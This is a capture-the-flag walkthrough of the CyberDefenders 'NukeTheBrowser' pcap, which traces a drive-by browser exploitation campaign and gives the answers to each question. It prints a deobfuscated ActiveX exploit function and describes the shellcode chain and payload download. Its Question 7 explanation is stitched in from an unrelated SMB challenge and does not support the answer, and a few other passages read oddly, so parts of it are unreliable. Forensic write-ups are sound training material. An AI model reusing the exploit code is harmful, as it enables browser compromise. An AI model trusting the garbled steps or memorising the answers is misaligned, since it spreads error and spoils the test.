CyberDefenders: NukeTheBrowser

A network trace with attack data is provided. Please note that the IP address of the victim has been changed to hide the true location.

Information

Category Name: NukeTheBrowser

Files:
c28-NukeTheBrowser.zip 105 KB
– NukeTheBrowser.pcap 306KB

My Recommendations

Wireshark is all we need to solve the challenge:

wireshark -v

Download it from CyberDefenders and verify it with:

sha1sum /path/to/c28-NukeTheBrowser.zip

SHA1SUM: f090b4726818459cbae29613f0d2ade999e18146

Walkthrough

1. Multiple systems were targeted. Provide the IP address of the highest one.

In Wireshark, we can use Statistics -> Conversations, which summarizes conversations by protocol. If we select IPv4 and sort Address A in descending order, we see that the highest IP address is 10.0.5.15:

Answer: 10.0.5.15

2. What protocol do you think the attack was carried over?

Usually, when dealing with pcap files, I like to peek into Export Objects -> HTTP and see what files were downloaded to the system.

There are four suspicious files. Their content type is ‘application/octet-stream’, the generic binary type under which executables are typically served. Moreover, they were downloaded from the hostname sploitme.com.cn, which is equally suspicious:

We can then save one of the files and check it on VirusTotal. In this case it is flagged as malicious.

Answer: HTTP

3. What was the URL for the page used to serve malicious executables?

 (don’t include URL parameters)

If we check the frames individually for the filenames above, they are all executables downloaded from the same ‘parent’ URL.

Without the parameters, the (disarmed) URL is http[://]sploitme[.]com[.]cn/fg/load[.]php

Answer: http[://]sploitme[.]com[.]cn/fg/load[.]php

4. What is the number of the packet that includes a redirect to the French version of Google and probably is an indicator for Geo-based targeting?

We can search for packets querying the French version of Google by using the dns.query.name filter:

After removing the filter, the packet right above shows a page redirecting to the French version of Google:

Answer: 299

5. What was the CMS used to generate the page 'shop.honeynet.sg/catalog/'?

(Three words, space in between)

First, we can filter for the request URI using the following query: http.request.uri == "/catalog/". It returns only one frame, 408. Next, we can click on that frame and select Analyze -> Follow -> HTTP Stream. Scrolling through, a special message reveals the CMS:

Answer: osCommerce Online Merchant

6. What is the number of the packet that indicates that 'show.php' will not try to infect the same host twice?

We can filter the packets for the specific URI path of show.php to see the requests issued:

http.request.uri.path == "/fg/show.php"

There are four packets matching this URI path. The first three have the same parameter, as opposed to the last one. Interestingly, the second and third packets are requested by the same host. We can check the responses to packets 157 and 358 and compare them.

Packet 174 contains the response to packet 157 (the first request from host 10.0.3.15):

The HTML page says that the URL is not found on the server, but it contains obfuscated JavaScript intended to infect the host.

The response to packet 358, which is packet 366, doesn’t contain any JavaScript:

Therefore packet 366 proves that show.php won’t infect the same host twice.

Answer: 366
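As an added example (not part of the original write-up), here is a pure-Python reproduction of that Wireshark filter over a libpcap file: it walks the Ethernet/IPv4/TCP headers, keeps segments whose payload begins with a GET request line, matches the URI path the way http.request.uri.path does, and reports which clients requested show.php more than once. The capture it parses is constructed inline; the 10.0.x.15 clients, the 192.0.2.x servers and the s=sample parameters are assumptions, not values from the challenge pcap.

```python
import socket
import struct
from collections import Counter

def build_pcap(frames):
    """Serialise raw frames as a little-endian libpcap file (link type 1 = Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(frame), len(frame)) + frame
    return out

def http_get_frame(src_ip, dst_ip, uri):
    """Ethernet/IPv4/TCP frame carrying one GET request (checksums left at zero)."""
    payload = f"GET {uri} HTTP/1.1\r\nHost: sploitme.com.cn\r\n\r\n".encode()
    tcp = struct.pack("!HHIIBBHHH", 1025, 80, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 1, 0,
                     64, 6, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload

def iter_http_requests(pcap):
    """Yield (frame_no, client_ip, request_uri) for every TCP segment that starts with a GET line."""
    endian = "<" if pcap[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    off, frame_no = 24, 0
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        frame, off, frame_no = pcap[off + 16:off + 16 + incl_len], off + 16 + incl_len, frame_no + 1
        if frame[12:14] != b"\x08\x00" or frame[23] != 6:  # keep IPv4-over-Ethernet TCP only
            continue
        tcp_off = 14 + (frame[14] & 0x0F) * 4                # skip the IP header (IHL in 32-bit words)
        payload = frame[tcp_off + (frame[tcp_off + 12] >> 4) * 4:]  # skip TCP header (data offset)
        if payload.startswith(b"GET "):
            uri = payload.split(b"\r\n", 1)[0].split(b" ")[1].decode(errors="replace")
            yield frame_no, socket.inet_ntoa(frame[26:30]), uri

def show_php_requests(pcap, path="/fg/show.php"):
    """Equivalent of http.request.uri.path == "/fg/show.php": [(frame_no, client_ip, uri)]."""
    return [(n, ip, uri) for n, ip, uri in iter_http_requests(pcap) if uri.split("?", 1)[0] == path]

def repeat_clients(hits):
    """Clients that requested the path more than once; the write-up says these get no second payload."""
    return sorted(ip for ip, n in Counter(ip for _, ip, _ in hits).items() if n > 1)

# Constructed sample capture mirroring the write-up: four show.php requests, the second and
# third from the same client, plus one unrelated request that the filter must not match.
SAMPLE_PCAP = build_pcap([
    http_get_frame("10.0.2.15", "192.0.2.10", "/fg/show.php?s=sample1"),
    http_get_frame("10.0.4.15", "192.0.2.20", "/catalog/"),
    http_get_frame("10.0.3.15", "192.0.2.10", "/fg/show.php?s=sample1"),
    http_get_frame("10.0.3.15", "192.0.2.10", "/fg/show.php?s=sample1"),
    http_get_frame("10.0.5.15", "192.0.2.10", "/fg/show.php?s=sample2"),
])
```

On the real capture, point build-free code at the file instead: show_php_requests(open("NukeTheBrowser.pcap", "rb").read()) lists the four requests and repeat_clients() names the host that was served the empty second response.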

7. One of the exploits being served targets a vulnerability in "msdds.dll". Provide the corresponding CVE number.

Removing the filters from smb.pcapng and using Wireshark's Find option (Packet details, Narrow & Wide, Strings) to search for SAMBA (noob life), there is a STATUS_LOGON_FAILURE at frame 76. To find its hex status code we must go to the NT Status field of this frame, which is 0x000006d.

Answer: CVE-2005-2127

8. What is the name of the executable being served via 'http://sploitme.com.cn/fg/load.php?e=8' ?

Looking for ‘javascript’ in the packet bytes, frame 496 contains a large block of obfuscated JavaScript:

We can save it as it is and then extract the JS code with bash, changing eval to console.log directly with sed so the script prints its decoded stage instead of executing it. Afterwards, we can simply run the code with js and save the deobfuscated output:

# keep only the script body (from line 11 up to the 4th-last line) and turn eval( into console.log(
tail -n +11 javascript.html | head -n -4 | sed 's/eval(/console.log(/g' > malicious.js
# run the modified script; the decoded stage is printed rather than executed
js malicious.js > deobfuscated.js

Here is a sample of the output:

Finally, to make it readable we can use CyberChef with the JavaScript Beautifier option. The script executes function mdac first:

function mdac() {
    var i = 0;
    // CLSIDs the exploit tries to instantiate, one per loop iteration; null terminates the list
    var objects = new Array(
        '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
        '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
        '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
        '{0006F033-0000-0000-C000-000000000046}',
        '{0006F03A-0000-0000-C000-000000000046}',
        '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
        '{6414512B-B978-451D-A0D8-FCFDF33E833C}',
        '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
        '{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
        '{639F725F-1B2D-4831-A9FD-874847682010}',
        '{BA018599-1DB3-44f9-83B4-461454C84BF8}',
        '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
        '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
        null);
    while (objects[i]) {
        var a = null;
        if (objects[i].substring(0, 1) == '{') {
            // instantiate the COM object through an <object> tag with the bare CLSID
            a = document.createElement('object');
            a.setAttribute('classid', 'clsid:' + objects[i].substring(1, objects[i].length - 1));
        } else {
            try {
                a = new ActiveXObject(objects[i]);
            } catch (e) {
            }
        }
        if (a) {
            try {
                var b = CreateO(a, 'WScript.Shell');
                if (b) {
                    if (Go(a)) {
                        if (CheckIP()) {
                            Complete();
                        } else {
                            aolwinamp();
                        }
                        return true;
                    }
                }
            } catch (e) {
            }
        }
        i++;
    }
    // none of the objects worked: fall through to the next exploit function
    aolwinamp();
}

Then, each function calls the next one in this order:

1. aolwinamp
2. directshow
3. snapshot
4. com
5. spreadsheet

Each function, except snapshot, contains a shellcode, and all of them are executed. We can list them all with egrep:

egrep 'function|unescape' beautified.js

Then, I individually copied and pasted each shellcode into CyberChef, decoded it and saved it under its function name. For example, the shellcode in function aolwinamp:

I ran each shellcode with scdbg, with the options ‘Unlimited Steps’ and ‘FindSc’. Function spreadsheet contained the shellcode relevant to ?e=8:

The output shows that the executable name is ‘e.exe’.

Answer: e.exe


9. ...Provide the full MD5 hash.

One of the malicious files was first submitted for analysis on VirusTotal at 2010-02-17 11:02:35 and has an MD5 hash ending with ‘78873f791’...

In question 2, the executable uploaded to VirusTotal was first submitted on 2010-02-17. Its MD5 hash is 52312bb96ce72f230f0350e78873f791.

Answer: 52312bb96ce72f230f0350e78873f791

10. What is the name of the function that hosted the shellcode relevant to 'http://sploitme.com.cn/fg/load.php?e=3'?

Previously, the obfuscated code in frame 496 showed multiple shellcodes being hosted on the site.

Function aolwinamp contained the shellcode relevant to load.php?e=3:

Answer: aolwinamp

11. Deobfuscate the JS at 'shop.honeynet.sg/catalog/' and...

..provide the value of the ‘click’ parameter in the resulted URL.

There is only one frame containing this URI, and it’s frame 415. If we select Analyze -> Follow -> HTTP Stream and search for JavaScript, there is only one occurrence:

Pasting its contents into a JavaScript sandbox, we can simply replace ‘document.write(m)’ with ‘console.log(m)’ so the decoded page is printed instead of rendered:


Answer: 84c090bd86

12. Deobfuscate the JS at 'rapidshare.com.eyu32.ru/login.php' and...

…provide the value of the ‘click’ parameter in the resulted URL.

Using Export Objects -> HTTP and filtering for rapidshare.com.eyu32.ru, we can select one of the returned frames and inspect its contents:

The JavaScript is passed through eval. We can copy its contents to a JavaScript sandbox. To deobfuscate the text, we just need to edit the script by inserting console.log( after eval( and adding a matching closing parenthesis at the end of the code:

The console returns the following:

which we can decode in CyberChef:

There it is!

Answer: 3feb5a6b2f

13. What was the version of 'mingw-gcc' that compiled the malware?

Following TCP stream of load.php?e=3, we can then search for gcc:

The mingw-gcc version is 3.4.5.

Answer: 3.4.5

14. The shellcode used a native function inside 'urlmon.dll' to download files from the internet to the compromised host...

..What is the name of the function?
The decoded shellcodes load the library urlmon.dll and call its function URLDownloadToFile:

Answer: URLDownloadToFile

TLDR

– NukeTheBrowser is a Network Forensics challenge in relation to PHP
– It’s a combination of malicious PHP, JavaScript and shellcode.
